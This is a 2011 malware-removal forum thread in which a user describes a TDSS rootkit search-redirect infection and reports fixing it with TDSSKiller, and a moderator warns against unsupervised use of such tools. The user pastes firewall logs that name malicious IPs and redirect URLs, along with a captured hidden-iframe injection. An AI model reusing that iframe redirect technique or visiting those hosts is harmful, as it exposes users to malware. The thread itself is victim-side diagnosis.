techiegirlwithsearchresvir Posted June 18, 2011 ID:442638 Share Posted June 18, 2011 All, I seem to have the same issue. Malwarebytes' Antimalware is detecting svchost process attempting ip connects to 91.212.226.6 when firefox is not running, and other ips when firefox is running.Also, when I search in Bing search textbox or Firefox s Google search text box, in either Internet Explorer or Firefox,respectively, and I click on the search result, it goes to other sites other than the original link. I checked the network tool part of Firefox 4, and it shows routes in the next following log.Malwarebytes' Malware did not detect it with version ~6879 today, nor did it detect anything when I tried a few days ago. I just updated to 6885 and trying again. A few days ago, I tried running ComboFix but it only deleted things in archive zip files and a java scheduler.May you please help me too? Should I open a new topic?Malwarebytes' Antimaleware log09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55264, Process: firefox.exe)09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55265, Process: firefox.exe)09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55266, Process: firefox.exe)09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55267, Process: firefox.exe)09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55268, Process: firefox.exe)09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55269, Process: firefox.exe)09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55270, Process: firefox.exe)09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55271, Process: firefox.exe)09:59:03 Diane IP-BLOCK 91.213.29.63 (Type: outgoing, Port: 55399, Process: firefox.exe)09:59:03 Diane IP-BLOCK 188.95.52.161 (Type: outgoing, Port: 55400, Process: firefox.exe)10:02:07 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55422, Process: svchost.exe)10:32:33 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55591, Process: svchost.exe)10:42:33 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55602, Process: svchost.exe)12:54:20 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55735, Process: svchost.exe)13:24:45 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55765, Process: svchost.exe)13:34:45 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55777, Process: svchost.exe)CLICKING ON TEXTpad download search result, when I had textpad download in search toolbar, spawns these HTTP requests:PLEASE DONT go to these URLS! THIS IS JUST FOR INFORMATIVE PURPOSES OF THE VIRUS.[01:25:03.941] GET http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Fwww.textpad.com%2Fdownload%2F&rct=j&q=textpad%20download&ei=Wjb8Td-uDYTx0gHqmrjMAw&usg=AFQjCNENIlIsriJbDbX7pwA4aFqrwF1lWQ&sig2=kGnhU6eU4bvJl-Qxrz0aJg [HTTP/1.1 200 OK 34ms][01:25:03.994] GET http://www.textpad.com/download/ [HTTP/1.1 200 OK 135ms][01:25:04.166] GET http://ajrentals.com/default.pk?tsearch=textpad+download&search_button.x=0&search_button.y=0 [HTTP/1.1 200 OK 446ms][01:25:04.643] GET http://195.3.145.184/6Vm3c4LL7t5ytoc915399c4acfcba3b08dbfb662cfba8ca937h [undefined 11ms]Request URL: http://www.textpad.com/download/ Request Method: GET Status Code: HTTP/1.1 200 OK Request Headers 01:25:04.018 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Charset:ISO-8859-1,utf-8;q=0.7,*;q=0.7Accept-Encoding:gzip, deflateAccept-Language:en-us,en;q=0.5Connection:keep-aliveHost:www.textpad.comKeep-Alive:115Referer:http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Fwww.textpad.com%2Fdownload%2F&rct=j&q=textpad%20download&ei=Wjb8Td-uDYTx0gHqmrjMAw&usg=AFQjCNENIlIsriJbDbX7pwA4aFqrwF1lWQ&sig2=kGnhU6eU4bvJl-Qxrz0aJgUser-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Sent Cookie __utnc:1 Response Headers ?135ms Cache-Control:no-cache, no-store, must-revalidate Connection:close Content-Length:143Content-Type:text/htmlExpires:Fri, 01 Jan 1990 00:00:00 GMTPragma:no-cacheSet-Cookie:__utnc=1; expires=Sat, 18-Jun-2011 05:55:04 GMT Response Body ?0ms <iframe src='http://ajrentals.com/default.pk?tsearch=textpad+download&search_button.x=0&search_button.y=0' style='visibility:hidden;'></iframe> Link to post Share on other sites More sharing options...
techiegirlwithsearchresvir Posted June 19, 2011 Author ID:442994 Share Posted June 19, 2011 I fixed this virus by researching it and finding a legitimate solution here.Anyone with symptoms that I describe above, you probably have this Google search redirect virus. It is known as the TDSS virus.The cure solution is explained in this article.It refers to a trusted TDSSKiller.zip that removes this known rootkit virus TDSSKiller. It was found on my OEM partition, not C drive or registry files.The cure solution TDSSKiller.zip should detect this TDSS virus. Once executed, it shows the detected virus, with option to "Cure". Click the Cure button, to safely cure the virus. The article says not to delete or quarantine because it might be in valid Windows files.Users, Best of luck!Malwarebytes' reps - you probably could put the same type of removal procedure for this rootkit TDSS virus in your ComboFix software. That would be best of both worlds, right?-Diane Link to post Share on other sites More sharing options...
LDTate Posted June 19, 2011 ID:443037 Share Posted June 19, 2011 We do not recommend users run these tools without supervision.DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision.Doing so could make your pc inoperatible and could require a full reinstall of your OS, losing all your programs and data.Same for TDSSKiller.Note: if the Cure option is not there, please select 'Skip'.The developers of Combofix and TDSSKiller are different parties. Link to post Share on other sites More sharing options...
LDTate Posted June 21, 2011 ID:443923 Share Posted June 21, 2011 Glad we could help. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread. Thanks! Link to post Share on other sites More sharing options...
Recommended Posts